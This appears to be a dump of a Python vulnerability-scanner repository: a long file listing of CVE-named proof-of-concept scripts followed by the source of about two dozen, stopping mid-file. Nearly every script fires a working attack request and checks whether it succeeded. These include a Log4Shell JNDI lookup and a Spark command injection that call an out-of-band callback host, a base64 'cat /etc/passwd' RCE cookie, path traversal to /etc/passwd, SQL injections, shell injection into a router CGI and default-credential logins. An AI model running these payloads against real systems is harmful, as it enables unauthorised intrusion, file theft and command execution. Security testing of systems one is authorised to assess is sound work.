├── poc-yaml-tlr-2005ksh-cve-2021-45428.py
├── poc-yaml-tlr-2855ks6-arbitrary-file-creation-cve-2021-46418.py
├── poc-yaml-tomcat-cve-2017-12615-rce.py
├── poc-yaml-tomcat-cve-2018-11759.py
├── poc-yaml-tongda-meeting-unauthorized-access.py
├── poc-yaml-tongda-oa-action-upload-php-upload.py
├── poc-yaml-tongda-oa-file-read.py
├── poc-yaml-tongda-oa-login-code-php-login-bypass.py
├── poc-yaml-tongda-oa-report-bi-func-php-sqli.py
├── poc-yaml-tongda-user-session-disclosure.py
├── poc-yaml-tongda-v119-sqli.py
├── poc-yaml-topapp-lb-any-user-login.py
├── poc-yaml-topsec-defalut-password.py
├── poc-yaml-topsec-rce.py
├── poc-yaml-totolink-cve-2022-25076-rce.py
├── poc-yaml-tpshop-directory-traversal.py
├── poc-yaml-tpshop-sqli.py
├── poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085.py
├── poc-yaml-twonkyserver-cve-2018-7171-fileread.py
├── poc-yaml-typecho-rce.py
├── poc-yaml-u5cms-cve-2022-32444-url-redirection.py
├── poc-yaml-ueditor-cnvd-2017-20077-file-upload.py
├── poc-yaml-uniview-isc-rce.py
├── poc-yaml-unraid-cve-2020-5847-remote-code-execution.py
├── poc-yaml-uwsgi-cve-2018-7490.py
├── poc-yaml-vbulletin-cve-2019-16759-bypass.py
├── poc-yaml-vbulletin-cve-2019-16759.py
├── poc-yaml-vbulletin-cve-2020-12720.py
├── poc-yaml-vicidial-info-leak.py
├── poc-yaml-visual-tools-dvr-vx16-cve-2021-42071.py
├── poc-yaml-vite-cnvd-2022-44615.py
├── poc-yaml-vmware-vcenter-arbitrary-file-read.py
├── poc-yaml-vmware-vcenter-cve-2021-21985-rce.py
├── poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972.py
├── poc-yaml-vmware-vrealize-cve-2021-21975-ssrf.py
├── poc-yaml-vmware-workspace-cve-2021-22054-ssrf.py
├── poc-yaml-vmware-workspace-cve-2022-22954-rce.py
├── poc-yaml-voipmonitor-cve-2022-24260.py
├── poc-yaml-vtigercrm-cve-2020-19363.py
├── poc-yaml-wanhu-oa-officeserver-file-upload.py
├── poc-yaml-wanhuoa-upload-rce.py
├── poc-yaml-wavlink-cve-2022-2486-rce.py
├── poc-yaml-wavlink-cve-2022-2488-rce.py
├── poc-yaml-wavlink-cve-2022-31845.py
├── poc-yaml-wavlink-cve-2022-31846.py
├── poc-yaml-wavlink-cve-2022-34046.py
├── poc-yaml-wavlink-cve-2022-34049.py
├── poc-yaml-wavlink-cve-2022-34570-info-leak.py
├── poc-yaml-wavlink-nightled-remote-command-execute.py
├── poc-yaml-wavlink-password-disclosure-cve-2022-34047.py
├── poc-yaml-weaver-e-office-lazyuploadify-upload.py
├── poc-yaml-weaver-ebridge-file-read.py
├── poc-yaml-weaver-ecology-getsqldata-sqli-rce.py
├── poc-yaml-weaver-eoffice-userselect-unauth.py
├── poc-yaml-weaver-oa-cnvd-2022-43245.py
├── poc-yaml-weaver-oa-eoffice-information-disclosure.py
├── poc-yaml-weaver-oa-ultra-vires.py
├── poc-yaml-webgrind-index-cve-2018-12909-fileread.py
├── poc-yaml-weblogic-cve-2017-10271-unserialize.py
├── poc-yaml-weblogic-cve-2017-10271.py
├── poc-yaml-weblogic-cve-2019-2725.py
├── poc-yaml-weblogic-cve-2019-2729-1.py
├── poc-yaml-weblogic-cve-2019-2729-2.py
├── poc-yaml-weblogic-cve-2020-14750.py
├── poc-yaml-weblogic-ssrf.py
├── poc-yaml-webmin-cve-2019-15107-rce.py
├── poc-yaml-weijiaoyi-post-curl-ssrf.py
├── poc-yaml-weiphp-path-traversal.py
├── poc-yaml-weiphp-sql.py
├── poc-yaml-western-digital-mycloud-ftp-download-exec.py
├── poc-yaml-western-digital-mycloud-jqueryfiletree-exec.py
├── poc-yaml-western-digital-mycloud-multi-uploadify-file-upload.py
├── poc-yaml-western-digital-mycloud-raid-cgi-exec.py
├── poc-yaml-western-digital-mycloud-sendlogtosupport-php-exec.py
├── poc-yaml-western-digital-mycloud-upload-php-exec.py
├── poc-yaml-western-digital-mycloud-upload-php-upload.py
├── poc-yaml-wi-fi-web-rce.py
├── poc-yaml-wifisky-default-password-cnvd-2021-39012.py
├── poc-yaml-wisegiga-nas-group-php-rce.py
├── poc-yaml-wordpress-all-in-one-video-gallery-cve-2022-2633.py
├── poc-yaml-wordpress-contact-form-7-cve-2020-35489-file-upload.py
├── poc-yaml-wordpress-cve-2019-19985-infoleak.py
├── poc-yaml-wordpress-ext-adaptive-images-lfi.py
├── poc-yaml-wordpress-ext-mailpress-rce.py
├── poc-yaml-wordpress-page-builder-kingcomposer-cve-2022-0165-url-redirect.py
├── poc-yaml-wordpress-photo-gallery-cve-2022-1281.py
├── poc-yaml-wordpress-seo-cve-2021-25118-info-leak.py
├── poc-yaml-wordpress-site-editor-cve-2018-7422-lfi.py
├── poc-yaml-wordpress-theplus-elementor-addon-cve-2021-24358-url-redirection.py
├── poc-yaml-wordpress-welcart-ecommerce-cve-2022-41840-path-traversal.py
├── poc-yaml-wordpress-woocommerce-cve-2021-32789-sqli.py
├── poc-yaml-wordpress-wp-google-maps-cve-2019-10692-sqli.py
├── poc-yaml-wordpress-wp-statistics-cve-2021-24340-sqli.py
├── poc-yaml-wso2-cve-2022-29464-fileupload.py
├── poc-yaml-wuzhicms-cve-2018-11528.py
├── poc-yaml-wuzhicms-v410-sqli.py
├── poc-yaml-xdcms-sql.py
├── poc-yaml-xiaomi-cve-2019-18371.py
├── poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation.py
├── poc-yaml-xunchi-cnvd-2020-23735-file-read.py
├── poc-yaml-yachtcontrol-webapplication-cve-2019-17270.py
├── poc-yaml-yapi-rce.py
├── poc-yaml-yccms-rce.py
├── poc-yaml-yihua-fileupload-cnvd-2022-50678.py
├── poc-yaml-yinda-get-file-read.py
├── poc-yaml-yongyou-nc-cloud-fs-sqli.py
├── poc-yaml-yongyou-u8-oa-sqli.py
├── poc-yaml-yonyou-ERP-NC-readfile.py
├── poc-yaml-yonyou-erp-u8-file-upload.py
├── poc-yaml-yonyou-grp-u8-file-upload.py
├── poc-yaml-yonyou-grp-u8-sqli-to-rce.py
├── poc-yaml-yonyou-grp-u8-sqli.py
├── poc-yaml-yonyou-ksoa-file-upload.py
├── poc-yaml-yonyou-nc-accept-file-upload.py
├── poc-yaml-yonyou-nc-arbitrary-file-upload.py
├── poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce.py
├── poc-yaml-yonyou-nc-file-upload.py
├── poc-yaml-yonyou-nc-service-info-leak.py
├── poc-yaml-yonyou-nc-uapws-db-info-leak.py
├── poc-yaml-yonyou-nc-xxe.py
├── poc-yaml-youphptube-cve-2019-18662.py
├── poc-yaml-youphptube-encoder-cve-2019-5127.py
├── poc-yaml-youphptube-encoder-cve-2019-5128.py
├── poc-yaml-youphptube-encoder-cve-2019-5129.py
├── poc-yaml-yungoucms-sqli.py
├── poc-yaml-zabbix-alllogin-cve-2022-23131.py
├── poc-yaml-zabbix-authentication-bypass.py
├── poc-yaml-zabbix-cve-2016-10134-sqli.py
├── poc-yaml-zabbix-cve-2019-17382.py
├── poc-yaml-zabbix-cve-2022-23134.py
├── poc-yaml-zabbix-default-password.py
├── poc-yaml-zcms-v3-sqli.py
├── poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal.py
├── poc-yaml-zentao-sqli-cnvd-2022-42853.py
├── poc-yaml-zeroshell-cve-2019-12725-rce.py
├── poc-yaml-zhixiang-oa-sqli.py
├── poc-yaml-zhiyuan-oa-fanruan-info-leak.py
├── poc-yaml-zhiyuan-oa-wpsassistservlet-file-upload.py
├── poc-yaml-zhongyuan-iaudit-getluserbysshport-php-code-exec.py
├── poc-yaml-ziguang-sqli-cnvd-2021-41638.py
├── poc-yaml-zimbra-collaboration-server-cve-2013-7091-lfi.py
├── poc-yaml-zimbra-cve-2019-9670-xxe.py
├── poc-yaml-zimbra-cve-2022-27925.py
├── poc-yaml-zoho-cve-2022-23779-info-leak.py
├── poc-yaml-zoho-manageengine-access-manager-plus-cve-2022-29081.py
├── poc-yaml-zoho-manageengine-desktop-central-cve-2021-44515.py
├── poc-yaml-zoho-manageengine-opmanager-cve-2020-12116.py
├── poc-yaml-zoneminder-cve-2016-10140-unauth-access.py
├── poc-yaml-zyxel-cve-2022-0342-auth-bypass.py
├── poc-yaml-zyxel-vmg1312-b10d-cve-2018-19326-path-traversal.py
├── poc-yaml-zyxel-ztp-rce-cve-2022-30525.py
├── poc-yaml-zzcms-zsmanage-sqli.py
├── shenyu-weak-jwt-cve-2021-37580.py
├── ssh-weak-password.py
├── tomcat-weak-password.py
├── tongda2022-login-bypass.py
├── unomi-rce-cve-2020-13942.py
├── v2board-cross-premission.py
├── was-console-unath.py
├── weaver-ecology-database-leak.py
├── weaver-eoffice-do-excel-file-write.py
├── weaver-eoffice-sqli-cnvd-2022-43246.py
├── xxljob-weak-password.py
├── yisaitong-rce-cnvd-2021-26058.py
├── zentao-2023-bypass-rce.py
├── zookeeper_Unauth.py
└── zzzcms-175-rce.py
├── requirements.txt
└── reverse
├── getdomain.py
└── getresult.py
/pocs/Apache-OFBiz-Log4shell-CVE-2021-44228.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | import sys,os
3 | cwd=os.getcwd()
4 | sys.path.append(cwd+'\\reverse')
5 | from getdomain import get_domain
6 | from getresult import get_result
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
8 | def scan(baseurl):
9 | if baseurl[-1]=='/':
10 | baseurl=baseurl
11 | else:
12 | baseurl=baseurl+"/"
13 | gets=get_domain()
14 | domain=gets[0]
15 | token=gets[1]
16 | url=baseurl+"webtools/control/main"
17 | headers={"Cookie": "OFBiz.Visitor=${jndi:ldap://"+domain+"/tea}"}
18 | response=requests.get(url,headers=headers,timeout=5,verify=False)
19 | if get_result(domain,token):
20 | r0=True
21 | else:
22 | r0=False
23 | if r0:
24 | return True
25 | else:
26 | return False
27 |
--------------------------------------------------------------------------------
/pocs/MagicFlow--mainxp-readfile.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("root:[x*]:0:0:",response.text):
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/d-link-ShareCenter-DNS-320-system_mgr-rce.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
3 | def randomLowercase(n):
4 | key=""
5 | zf="qwertyuiopasdfghjklzxcvbnm"
6 | import random
7 | for _ in range(n):
8 | suiji1=random.randint(0,len(zf)-1)
9 | key+=zf[suiji1]
10 | return key
11 | r1=randomLowercase(8)
12 | def scan(baseurl):
13 | if baseurl[-1]=='/':
14 | baseurl=baseurl
15 | else:
16 | baseurl=baseurl+"/"
17 | url=baseurl+"cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;"
18 | response=requests.get(url,verify=False,timeout=5)
19 | if 'system_mgr.cgi' in response.text:
20 | return True
21 | else:
22 | return False
23 |
--------------------------------------------------------------------------------
/pocs/dictory-read.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 |
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 | def scan(baseurl):
6 | if baseurl[-1]=='/':
7 | baseurl=baseurl
8 | else:
9 | baseurl=baseurl+"/"
10 | url=baseurl+""
11 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
12 | response=requests.get(url,headers=headers,timeout=5,verify=False)
13 | if 'Directory listing for /' in response.text or 'Index of /' in response.text:
14 | r0=True
15 | else:
16 | r0=False
17 | if r0:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/memcache_Unauth.py:
--------------------------------------------------------------------------------
1 | #-*-coding:utf-8-*-
2 | import socket
3 | def getdomain(url):
4 | # if '/' in url:
5 | url = url.replace('http://', '').replace('https://', '')
6 | url = url + '/'
7 | url = url.split('/')[0]
8 | return url
9 | def scan(baseurl):
10 | domain=getdomain(baseurl)
11 | ip=domain.split(':')[0]
12 | port=int(domain.split(':')[1])
13 | try:
14 | socket.setdefaulttimeout(5)
15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 | s.connect((ip, port))
17 | s.send(bytes('stats\r\n', 'UTF-8'))
18 | if 'version' in s.recv(1024).decode():
19 | return True
20 | else:
21 | return False
22 | s.close()
23 | except:
24 | return False
25 |
--------------------------------------------------------------------------------
/pocs/poc-api-v2-unath.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(url):
5 | if url[-1]=='/':
6 | url2=url+'v2/api-docs'
7 | else:
8 | url2=url+'/v2/api-docs'
9 | r=requests.get(url2,timeout=5,verify=False)
10 | if 'swagger' in r.text:
11 | r0=True
12 | else:
13 | r0=False
14 | if r0:
15 | return True
16 | else:
17 | return False
18 |
--------------------------------------------------------------------------------
/pocs/poc-javamelody-monitoring-unath.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(url):
5 | if url[-1]=='/':
6 | url2=url+'monitoring'
7 | else:
8 | url2=url+'/monitoring'
9 | r=requests.get(url2,timeout=5,verify=False)
10 | if 'JavaMelody' in r.text and r.status_code==200:
11 | r0=True
12 | else:
13 | r0=False
14 | if r0:
15 | return True
16 | else:
17 | return False
18 |
--------------------------------------------------------------------------------
/pocs/poc-javamelody-monitoring-xss.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(url):
5 | if url[-1]=='/':
6 | url2=url+'monitoring?part=graph&graph=usedMemory'
7 | else:
8 | url2=url+'/monitoring?part=graph&graph=usedMemory'
9 | r=requests.get(url2,timeout=5,verify=False)
10 | r.encoding='utf-8'
11 | if '' in r.text and '监控系统在 _' in r.text and r.status_code==200:
12 | r0=True
13 | else:
14 | r0=False
15 | if r0:
16 | return True
17 | else:
18 | return False
19 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-cve-2020-22211-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def randomInt(s,e):
5 | import random
6 | key=random.randint(int(s),int(e))
7 | return key
8 | rand=randomInt(100000, 200000)
9 | def scan(baseurl):
10 | if baseurl[-1]=="/":
11 | baseurl=baseurl
12 | else:
13 | baseurl=baseurl+"/"
14 | url=baseurl+"plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5("+str(rand)+"),9%23"
15 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
16 | response=requests.get(url,headers=headers,timeout=5,verify=False)
17 | if response.status_code == 200 and md5(str(rand).encode()).hexdigest() in response.text:
18 | r0=True
19 | else:
20 | r0=False
21 | if r0:
22 | return True
23 | else:
24 | return False
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-sqli-2.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 |
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 | def randomInt(s,e):
6 | import random
7 | key=random.randint(int(s),int(e))
8 | return key
9 | rand=randomInt(200000000, 210000000)
10 | def scan(baseurl):
11 | if baseurl[-1]=='/':
12 | baseurl=baseurl
13 | else:
14 | baseurl=baseurl+"/"
15 | url=baseurl+"plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5("+str(rand)+"),5,6,7,8,9%23"
16 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
17 | response=requests.get(url,headers=headers,timeout=5,verify=False)
18 | if md5(str(rand).encode()).hexdigest() in response.text:
19 | r0=True
20 | else:
21 | r0=False
22 | if r0:
23 | return True
24 | else:
25 | return False
26 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a'
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if "ef775988943825d2871e1cfa75473ec" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Ametys-CMS-CVE-2022-26159.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"plugins/web/service/search/auto-completion/domain/en.xml?q=adm"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("xml version=\"1.0\"",response.text) and '' in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-EWEBS-fileread.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"casmain.xgi"
10 | body="Language_S=../../../../windows/win.ini"
11 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0","Content-Type": "application/x-www-form-urlencoded"}
12 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
13 | if response.status_code == 200 and "for 16-bit app support" in response.text:
14 | windows0=True
15 | else:
16 | windows0=False
17 | if windows0:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Emlog-CVE-2021-3293.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"t/index.php?action[]=test"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "Warning" in response.text and "expects parameter" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Full-read-SSRF-in-Spring-Cloud-Netflix.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"proxy.stream?origin=http://www.baidu.com/?"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "baidu.com" in response.text and "bdstatic.com" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Ivanti-Endpoint-Manager-CVE-2021-44529-RCE.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"client/index.php"
10 | headers={'Cookie': 'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID='}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("root:[x*]:0:0:",response.text):
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-airflow-unauth.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"admin/"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "Airflow - DAGs" in response.text and "DAGs
" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-alibaba-anyproxy-fetchbody-fileread.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"fetchBody?id=1/../../../../../../../../etc/passwd"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("root:[x*]:0:0:",response.text):
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-alibaba-canal-info-leak.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"api/v1/canal/config/1/1"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "ncanal.aliyun.accessKey" in response.text and "ncanal.aliyun.secretKey" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-airflow-cve-2020-13927-unauthorized.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"api/experimental/latest_runs"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "\"dag_run_url\":" in response.text and "\"dag_id\":" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-ambari-default-password.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name"
10 | headers={'Authorization': 'Basic YWRtaW46YWRtaW4='}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "PrivilegeInfo" in response.text and "AMBARI.ADMINISTRATOR" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-guacamole-default-password.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"api/tokens"
10 | body="username=guacadmin&password=guacadmin"
11 | headers={'Content-Type': 'application/x-www-form-urlencoded'}
12 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
13 | if response.status_code == 200 and "\"userID\":\"guacadmin\"" in response.text and "\"authToken\"" in response.text:
14 | r0=True
15 | else:
16 | r0=False
17 | if r0:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-spark-rce-cve-2022-33891.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3,time
2 | import sys,os
3 | cwd=os.getcwd()
4 | sys.path.append(cwd+'\\reverse')
5 | from getdomain import get_domain
6 | from getresult import get_result
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
8 | def scan(baseurl):
9 | if baseurl[-1]=="/":
10 | baseurl=baseurl
11 | else:
12 | baseurl=baseurl+"/"
13 | gets=get_domain()
14 | domain=gets[0]
15 | token=gets[1]
16 | url=baseurl+"?doAs=`curl%20http://"+domain+"`"
17 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
18 | response=requests.get(url,headers=headers,timeout=5,verify=False)
19 | time.sleep(2)
20 | if get_result(domain,token):
21 | r0=True
22 | else:
23 | r0=False
24 | if r0:
25 | return True
26 | else:
27 | return False
28 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-storm-unauthorized-access.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"api/v1/cluster/summary"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "{\"totalMem\":" in response.text and "\"stormVersion\":" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-atlassian-jira-cve-2019-3401.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"secure/ManageFilters.jspa?filter=popular&filterView=popular"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("",response.text):
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-atlassian-jira-cve-2022-0540.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
